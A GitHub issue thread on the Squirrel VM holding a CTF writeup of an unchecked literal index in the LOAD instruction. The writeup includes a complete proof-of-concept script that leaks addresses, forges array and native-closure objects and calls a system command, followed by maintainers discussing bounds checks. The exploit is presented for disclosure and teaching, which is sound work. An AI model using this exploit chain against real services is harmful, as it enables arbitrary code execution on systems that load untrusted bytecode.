CherryWorm commented 4 years ago

The Squirrel VM was featured in a recent German CTF (https://earth.2020.cscg.de/). The setup was as follows: a server reads Squirrel files (source code or bytecode) and executes them. The goal was to pop a shell; however, the system library (systemlib) had not been registered.

There were numerous solutions exploiting several different 0-days: some used only source code, while others patched the compiled bytecode. I'm sure other people will post their writeups in the coming days as well, and I think all of these bugs are worth fixing. What follows is my writeup, along with the PoC Squirrel script.

The vulnerability

I exploited the following vulnerability in sqvm.cpp:

case _OP_LOAD:
    TARGET = ci->_literals[arg1];
    continue;

Here, arg1 is an arbitrary signed integer taken directly from the instruction, and there is no bounds check on the literal array, so this lets us load SQObjectPtrs from an arbitrary offset relative to ci->_literals onto the stack.
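For comparison, a bounds-checked version of this load could look like the following C++ sketch. It is a simplified model, not Squirrel's actual code: Literal, FrameModel and nliterals are hypothetical stand-ins for SQObjectPtr, the call frame and the literal count kept by the function prototype (how that count is reached from ci is an assumption).

```cpp
#include <cassert>
#include <cstdint>
#include <stdexcept>

// Hypothetical stand-in for a 16-byte SQObjectPtr: a type word and a value word.
struct Literal {
    uint64_t type;
    uint64_t value;
};

// Hypothetical model of the call frame: a pointer to the literal array
// (like ci->_literals) plus its length, assumed to be reachable at runtime.
struct FrameModel {
    const Literal* literals;
    int64_t nliterals;
};

// Bounds-checked variant of `TARGET = ci->_literals[arg1];`.
// arg1 comes straight from the (possibly patched) instruction, so both a
// negative value and a value past the end of the array must be rejected.
Literal load_literal(const FrameModel& ci, int32_t arg1) {
    if (arg1 < 0 || arg1 >= ci.nliterals)
        throw std::out_of_range("LOAD: literal index out of range");
    return ci.literals[arg1];
}
```

In the real VM such a check would sit in the _OP_LOAD handler and raise a Squirrel error rather than throw a C++ exception.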

General setup

I wrote a small script that patches the following function in a compiled Squirrel script:

function LOAD() {
    // this gets patched to LOAD 1 0x1000 0 0
    return "a"
}

As hinted at in the comment, the function normally loads the string "a" and returns it (the instruction LOAD 1 1 0 0). My script replaces arg1 with 0x1000, so the load reads entry 0x1000 of the literal array instead, which triggers the out-of-bounds read.
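To see why the patch only touches one field, here is a C++ model of the instruction encoding. It assumes the SQInstruction layout from sqopcodes.h (a signed 32-bit arg1 followed by the one-byte op, arg0, arg2 and arg3), reads "LOAD 1 1 0 0" as op arg0 arg1 arg2 arg3, and assumes 0x01 as the value of _OP_LOAD and a little-endian host.

```cpp
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Assumed mirror of SQInstruction: arg1 is a full signed 32-bit field,
// the opcode and the remaining operands are single bytes.
struct Instruction {
    int32_t arg1;  // for LOAD: index into the literal array
    uint8_t op;
    uint8_t arg0;  // for LOAD: target stack slot
    uint8_t arg2;
    uint8_t arg3;
};
static_assert(sizeof(Instruction) == 8, "expected an 8-byte instruction");

constexpr uint8_t OP_LOAD = 0x01;  // assumed value of _OP_LOAD

// Raw bytes of an instruction as they sit in memory on a little-endian machine.
std::array<uint8_t, 8> encode(const Instruction& ins) {
    std::array<uint8_t, 8> bytes{};
    std::memcpy(bytes.data(), &ins, sizeof ins);
    return bytes;
}

// Count how many bytes differ between two encoded instructions.
int differing_bytes(const std::array<uint8_t, 8>& a, const std::array<uint8_t, 8>& b) {
    int n = 0;
    for (std::size_t i = 0; i < a.size(); ++i)
        if (a[i] != b[i]) ++n;
    return n;
}
```

Under these assumptions, LOAD 1 1 0 0 and LOAD 1 0x1000 0 0 differ only in the first two bytes, i.e. inside arg1.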

Exploit

I used the following trick to leak addresses:

function addr(a) {
    local spl = ::split("" + a, ":")
    if (spl.len() != 2)
        throw "expected (%s : 0x%p), got " + a + " instead"
    return spl[1].slice(5, -1).tointeger(16)
}

Squirrel prints an SQObjectPtr that it cannot otherwise convert to a string (such as a table or an object with an unknown type) in the format "(%s : 0x%p)", where %p is the second 8 bytes of this 16-byte structure. To illustrate, I use this to leak a heap address from the root table:

local heap_base = 0xFFFFFFFFFFFFF000 & addr(getroottable())
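The parsing done by addr and the page mask can be mirrored in C++ as below. The `slice(5, -1)` presumably works because glibc's %p already prints its own "0x", so "0x%p" yields something like "0x0x55d4c3a2b2a0"; since that output format is an assumption, this sketch simply takes the digits after the last "0x". parse_leak and page_base are illustrative names.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <stdexcept>
#include <string>

// Extract the pointer from a string such as "(table : 0x0x55d4c3a2b2a0)".
// Assumption: %p already prints its own "0x", so "0x%p" produces a doubled
// prefix; taking the digits after the last "0x" works with or without it.
uint64_t parse_leak(const std::string& s) {
    std::size_t colon = s.find(':');
    std::size_t close = s.rfind(')');
    if (colon == std::string::npos || close == std::string::npos || close < colon)
        throw std::invalid_argument("expected (%s : 0x%p), got " + s + " instead");
    std::string value = s.substr(colon + 1, close - colon - 1);
    std::size_t prefix = value.rfind("0x");
    if (prefix == std::string::npos)
        throw std::invalid_argument("no hex value in " + s);
    return std::stoull(value.substr(prefix + 2), nullptr, 16);
}

// Round an address down to the start of its 4 KiB page, which is what
// `0xFFFFFFFFFFFFF000 & addr(...)` does.
uint64_t page_base(uint64_t addr) {
    return addr & ~uint64_t{0xFFF};
}
```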

Next, I create a large (but not too large) blob, which gets allocated on the heap somewhere after the literal array:

local size = 0x10000
local buffer = blob(size)
for (local i = 0; i < size / 8; i++) {
    writeLong(buffer, i)
}

I tag every 8-byte slot with its own index so that I can later identify which slot the LOAD primitive loads onto the stack. Calling addr on the loaded object returns its second 8 bytes, which, because the read lands inside the blob, is the tag of one of the blob's slots.

// find the index of the buffer element that gets loaded by LOAD (constants_table + 0x1000 * 0x10)
local index = addr(LOAD())
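The tagging scheme can be modelled in C++ as follows. make_tagged_blob mimics the loop above (writeLong writes the low and then the high 32 bits, so on a little-endian machine, which is assumed here, slot i holds the 64-bit value i), and read_object stands in for the 16-byte object that the out-of-bounds LOAD reads at some 8-aligned offset inside the blob. Both names are hypothetical.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical C++ equivalent of the Squirrel loop above: writeLong stores the
// low and then the high 32 bits of each value, so on a little-endian machine
// (assumed) the 8-byte slot i ends up holding the 64-bit value i.
std::vector<uint8_t> make_tagged_blob(std::size_t size) {
    std::vector<uint8_t> blob(size);
    for (uint64_t i = 0; i < size / 8; ++i) {
        uint32_t lo = static_cast<uint32_t>(i & 0xFFFFFFFF);
        uint32_t hi = static_cast<uint32_t>((i >> 32) & 0xFFFFFFFF);
        std::memcpy(&blob[i * 8], &lo, 4);
        std::memcpy(&blob[i * 8 + 4], &hi, 4);
    }
    return blob;
}

// A 16-byte object as the out-of-bounds LOAD would see it: the first word is
// taken as the type, the second as the value.
struct RawObject {
    uint64_t type;
    uint64_t value;
};

// Read such an object from an 8-aligned byte offset inside the blob.
RawObject read_object(const std::vector<uint8_t>& blob, std::size_t offset) {
    RawObject obj{};
    std::memcpy(&obj.type, &blob[offset], 8);
    std::memcpy(&obj.value, &blob[offset + 8], 8);
    return obj;
}
```

In this model, addr(LOAD()) corresponds to the value word, and the type word of the loaded object sits at byte offset index * 8 - 8 in the blob.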

Now, if we overwrite the 8 bytes directly before this index, we control the type of the SQObjectPtr that we load onto the stack.

First of all, I use this to create a fake array: the type word becomes OT_ARRAY (134217792, i.e. 0x08000040), and the second 8 bytes are the address at which the array struct is supposedly stored:

buffer.seek(index * 8 - 8)
writeLong(buffer, 134217792)
// read some index in big buffer, to find address of the buffer
writeLong(buffer, heap_base + 0x1000 * 0x10 - 0x38)
local leak_array = LOAD()
local buffer_start = heap_base + 0x1000 * 0x10 - leak_array.len() * 8

The first value I want to leak is the one stored at heap_base + 0x1000 * 0x10 (the -0x38 is the offset of the _size field in the array struct, which I read by calling len() on the fake array). This is just some address inside the blob, but we know its absolute value, so we can compute the address where the blob's data starts by subtracting the tag we read there times 8, because each tag occupies one 8-byte slot. We're going to need this address later on.
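The arithmetic behind this step, written out as a small C++ sketch. The type constant is derived from flag values assumed from squirrel.h (they reproduce 134217792), the 0x38 offset is the one used above, and the helper names are made up for illustration.

```cpp
#include <cassert>
#include <cstdint>

// Type tag of the fake object, assuming the flag values from squirrel.h:
// _RT_ARRAY = 0x40 combined with SQOBJECT_REF_COUNTED = 0x08000000.
constexpr uint64_t SQOBJECT_REF_COUNTED = 0x08000000;
constexpr uint64_t OT_ARRAY = 0x40 | SQOBJECT_REF_COUNTED;
static_assert(OT_ARRAY == 134217792, "matches the constant written by the exploit");

// Offset of the _size field inside the array struct, as given in the writeup.
constexpr uint64_t ARRAY_SIZE_OFFSET = 0x38;

// Value to store as the fake array's pointer so that len() returns the
// 8 bytes located at `target`.
constexpr uint64_t fake_array_ptr(uint64_t target) {
    return target - ARRAY_SIZE_OFFSET;
}

// If the slot at absolute address `probe` holds tag `tag`, the blob's data
// starts `tag` 8-byte slots earlier.
constexpr uint64_t blob_start(uint64_t probe, uint64_t tag) {
    return probe - tag * 8;
}
```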

We use the same trick again, this time to leak a function pointer inside sqstdlib by reading the struct of a native closure (in this case blob.tell). Then we add a fixed offset to it (15728, which is specific to the binary) to get a pointer to the function sqstd_register_systemlib:

local tell_closure_addr = addr(blob.tell)

// write a fake array at that index to get an arbitrary read
buffer.seek(index * 8 - 8)
writeLong(buffer, 134217792)
// read function field of closure
writeLong(buffer, tell_closure_addr + 0xd * 8 - 0x38)
leak_array = LOAD()
local actual_tell_addr = leak_array.len()
local actual_register_systemlib_addr = actual_tell_addr + 15728
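The two offsets in this step compose as in the following C++ sketch. The values are the ones used in the exploit, 15728 (0x3d70) only holds for the binary being attacked, and the function names are illustrative.

```cpp
#include <cassert>
#include <cstdint>

// Offsets taken from the writeup; they hold for the 64-bit build used in the CTF.
constexpr uint64_t ARRAY_SIZE_OFFSET = 0x38;   // _size field of the array struct
constexpr uint64_t FUNCTION_OFFSET = 0xd * 8;  // _function field of a native closure
// Distance from blob.tell's C function to sqstd_register_systemlib in that
// particular binary; any other build will need a different value.
constexpr uint64_t SYSTEMLIB_DELTA = 15728;

// Fake array pointer whose len() returns the closure's _function pointer.
constexpr uint64_t fake_array_for_function(uint64_t closure_addr) {
    return closure_addr + FUNCTION_OFFSET - ARRAY_SIZE_OFFSET;
}

// Address of sqstd_register_systemlib, given the leaked address of tell's C function.
constexpr uint64_t register_systemlib_addr(uint64_t tell_fn) {
    return tell_fn + SYSTEMLIB_DELTA;
}
```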

Now we know the absolute addresses of both our blob and sqstd_register_systemlib, which is enough to craft our own NativeClosure.

An SQObjectPtr that refers to a NativeClosure has the following layout: its first 8 bytes hold the NativeClosure type (134218240, i.e. 0x08000200), and its second 8 bytes hold a pointer to a NativeClosure struct. This is what we need the absolute address of our blob for, since the struct is placed in the blob right after the fake object.

The struct contains a number of fields plus a pointer to the actual C function that gets called when we call the object from Squirrel. If all fields except the function pointer are 0, every check before the actual call passes by default. This includes the parameter-count check, which is why I chose to call sqstd_register_systemlib: it takes no Squirrel-level arguments and makes arbitrary command execution possible afterwards. This is what the following code does:

// write SQObjectPtr of type NativeClosure, that points to our NativeClosure-struct
buffer.seek(index * 8 - 8)
writeLong(buffer, 134218240)
writeLong(buffer, buffer_start + index * 8 + 8)
// write native closure struct
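writeLong(buffer, 0) // header: vtable pointer
writeLong(buffer, 0) // header: ref-count / GC bookkeeping
writeLong(buffer, 0) // header: ref-count / GC bookkeeping
writeLong(buffer, 0) // header: ref-count / GC bookkeeping
writeLong(buffer, 0) // header: ref-count / GC bookkeeping
writeLong(buffer, 0) // header: ref-count / GC bookkeeping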
writeLong(buffer, 0) // SQInteger _nparamscheck;
writeLong(buffer, 0) // SQIntVec _typecheck; T* _vals;
writeLong(buffer, 0) // SQIntVec _typecheck; SQUnsignedInteger _size;
writeLong(buffer, 0) // SQIntVec _typecheck; SQUnsignedInteger _allocated;
writeLong(buffer, 0) // SQObjectPtr *_outervalues;
writeLong(buffer, 0) // SQUnsignedInteger _noutervalues;
writeLong(buffer, 0) // SQWeakRef *_env;
writeLong(buffer, actual_register_systemlib_addr) // SQFUNCTION _function;
writeLong(buffer, 0) // SQObjectPtr _name;

// load and call native closure
local native_closure = LOAD()
native_closure()
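As a consistency check, the following C++ sketch models the struct written above as a flat sequence of 8-byte words (a hypothetical stand-in, not Squirrel's own class) and confirms that _function lands at offset 0xd * 8, the same offset used earlier to read blob.tell's function pointer. The type constant again assumes the flag values from squirrel.h.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Type tag of the fake object, assuming _RT_NATIVECLOSURE = 0x200 and
// SQOBJECT_REF_COUNTED = 0x08000000 as in squirrel.h.
constexpr uint64_t OT_NATIVECLOSURE = 0x200 | 0x08000000;
static_assert(OT_NATIVECLOSURE == 134218240, "matches the constant written by the exploit");

// Flat, hypothetical model of the 64-bit native-closure layout implied by the
// comments in the code above. Field names are illustrative.
struct FakeNativeClosure {
    uint64_t header[6];     // vtable pointer plus ref-count / GC fields
    int64_t nparamscheck;   // 0: no parameter-count check
    uint64_t typecheck[3];  // SQIntVec: _vals, _size, _allocated
    uint64_t outervalues;
    uint64_t noutervalues;
    uint64_t env;
    uint64_t function;      // SQFUNCTION that gets called
    uint64_t name_type;     // first word of SQObjectPtr _name (the only word written)
};
static_assert(offsetof(FakeNativeClosure, function) == 0xd * 8,
              "consistent with the 0xd * 8 offset used to read blob.tell");

// The struct is written directly after the fake object's value word,
// i.e. one 8-byte slot past `index`.
constexpr uint64_t closure_struct_addr(uint64_t buffer_start, uint64_t index) {
    return buffer_start + index * 8 + 8;
}
```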

At this point the entire system standard library is registered, including the system function. Getting the flag is now as easy as this:

::system("cat flag")

POC Script

function LOAD() {
    // this gets patched to LOAD 1 0x1000 0 0
    return "a"
}

function debug(str) {
    print("============================================ " + str + " ============================================\n")
}

function hex(i) {
    local charset = "0123456789abcdef"
    local res = ""
    local neg = false
    if (i < 0) {
        neg = true
        i = -i
    }
    do {
        local current = i & 0xF
        i = i >> 4
        res = charset.slice(current, current + 1) + res
    } while (i != 0)
    if (neg)
        return "-0x" + res
    return "0x" + res
}

function addr(a) {
    local spl = ::split("" + a, ":")
    if (spl.len() != 2)
        throw "expected (%s : 0x%p), got " + a + " instead"
    return spl[1].slice(5, -1).tointeger(16)
}

function writeLong(buf, l) {
    buf.writen(l&0xFFFFFFFF, 'i')
    buf.writen((l>>32)&0xFFFFFFFF, 'i')
}

// create a big blob that we can't miss, and label it so we know which index we hit with LOAD
local size = 0x10000
local buffer = blob(size)
for (local i = 0; i < size / 8; i++) {
    writeLong(buffer, i)
}

// leak some heap address that's close enough to the buffer
local heap_base = 0xFFFFFFFFFFFFF000 & addr(getroottable())

// find the index of the buffer element that gets loaded by LOAD (constants_table + 0x1000 * 0x10)
local index = addr(LOAD())
debug(index)

// write a fake array at that index to get an arbitrary read
buffer.seek(index * 8 - 8)
writeLong(buffer, 134217792)
// read some index in big buffer, to find address of the buffer
writeLong(buffer, heap_base + 0x1000 * 0x10 - 0x38)
local leak_array = LOAD()
local buffer_start = heap_base + 0x1000 * 0x10 - leak_array.len() * 8
debug("buffer_start: " + hex(buffer_start))

local tell_closure_addr = addr(blob.tell)
debug("tell closure: " + hex(tell_closure_addr))

// write a fake array at that index to get an arbitrary read
buffer.seek(index * 8 - 8)
writeLong(buffer, 134217792)
// read function field of closure
writeLong(buffer, tell_closure_addr + 0xd * 8 - 0x38)
leak_array = LOAD()
local actual_tell_addr = leak_array.len()
debug("actual tell addr: " + hex(actual_tell_addr))
local actual_register_systemlib_addr = actual_tell_addr + 15728
debug("actual register_systemlib addr: " + hex(actual_register_systemlib_addr))

buffer.seek(index * 8 - 8)
writeLong(buffer, 134218240)
writeLong(buffer, buffer_start + index * 8 + 8)
// write native closure struct
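writeLong(buffer, 1) // header: vtable pointer
writeLong(buffer, 2) // header: ref-count / GC bookkeeping
writeLong(buffer, 3) // header: ref-count / GC bookkeeping
writeLong(buffer, 4) // header: ref-count / GC bookkeeping
writeLong(buffer, 5) // header: ref-count / GC bookkeeping
writeLong(buffer, 6) // header: ref-count / GC bookkeeping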
writeLong(buffer, 0) // SQInteger _nparamscheck;
writeLong(buffer, 0) // SQIntVec _typecheck; T* _vals;
writeLong(buffer, 0) // SQIntVec _typecheck; SQUnsignedInteger _size;
writeLong(buffer, 0) // SQIntVec _typecheck; SQUnsignedInteger _allocated;
writeLong(buffer, 0) // SQObjectPtr *_outervalues;
writeLong(buffer, 0) // SQUnsignedInteger _noutervalues;
writeLong(buffer, 0) // SQWeakRef *_env;
writeLong(buffer, actual_register_systemlib_addr) // SQFUNCTION _function;
writeLong(buffer, 0x1337) // SQObjectPtr _name;

// load as native closure
local native_closure = LOAD()

native_closure()

::system("cat flag")

zeromus commented 4 years ago

I'm not sure there is anything here for Squirrel to tackle. The real vulnerability is in the service running untrusted bytecode. Even if you stuffed the VM with every sanity check possible, so that it spent 100% of its time checking sanity and 0% doing useful work, someone would still find a way to exploit it. I think the source-only exploits will be more interesting, since it's reasonable to do sanity checks there as a precaution against programming mistakes, even if you have no interest in building a mission-critical server application.

CherryWorm commented 4 years ago

I don't think it's unreasonable to have bounds checks for things like the load instruction (there's a similar vulnerability in the move instruction). It's not as if the VM is optimized to the point where this would impact performance in any meaningful way, and it could also prevent the exploitation of other bugs.

The way you put it makes it sound unreasonable to expect a VM to be free of undefined behaviour no matter what bytecode it executes, but I don't think most people would agree. Not only is it not that hard to write decent, non-exploitable code that still performs well; most popular VM languages, Java for example, actually guarantee this. Obviously a source-only vulnerability is more critical, but this should still either be fixed, or every function that may load bytecode should carry a visible warning that doing so might lead to exploitable undefined behaviour.

albertodemichelis commented 4 years ago

I think one solution would be a "sanitycheck" parameter in the load function that optionally bounds-checks the bytecode and looks for other possible exploits. I'd rather not do any sanity checks at runtime, especially in an environment where the source is trusted. Squirrel's bytecode was never meant to be executed from an untrusted source, but I can understand that someone might want that. Still, I think making the bytecode "safe", Java style, is quite an ambitious task.
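A rough C++ sketch of what such an optional load-time check could look like for the LOAD instruction. Everything here is hypothetical: FunctionModel and sanity_check are not part of Squirrel's API, the instruction layout and the _OP_LOAD value are assumed, and a real check would need rules for every opcode that indexes literals or stack slots (MOVE, for instance).

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Assumed mirror of SQInstruction (signed 32-bit arg1, then one-byte fields).
struct Instruction {
    int32_t arg1;
    uint8_t op;
    uint8_t arg0;
    uint8_t arg2;
    uint8_t arg3;
};

constexpr uint8_t OP_LOAD = 0x01;  // assumed value of _OP_LOAD

// Hypothetical summary of a loaded function prototype.
struct FunctionModel {
    std::vector<Instruction> code;
    int64_t nliterals;  // number of entries in the literal array
    int64_t stacksize;  // number of stack slots the function may use
};

// Validate once at load time, so the interpreter loop itself can stay unchecked.
// Only LOAD is covered here; other opcodes need their own rules.
bool sanity_check(const FunctionModel& f) {
    for (const Instruction& ins : f.code) {
        if (ins.op == OP_LOAD) {
            if (ins.arg1 < 0 || ins.arg1 >= f.nliterals) return false;  // literal index
            if (ins.arg0 >= f.stacksize) return false;                  // target slot
        }
    }
    return true;
}
```

Because the check runs once per loaded function rather than once per executed instruction, trusted code that skips the optional check pays nothing at runtime.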

albertodemichelis / squirrel

Out of bounds read in LOAD-instruction can be abused for arbitrary code execution #219
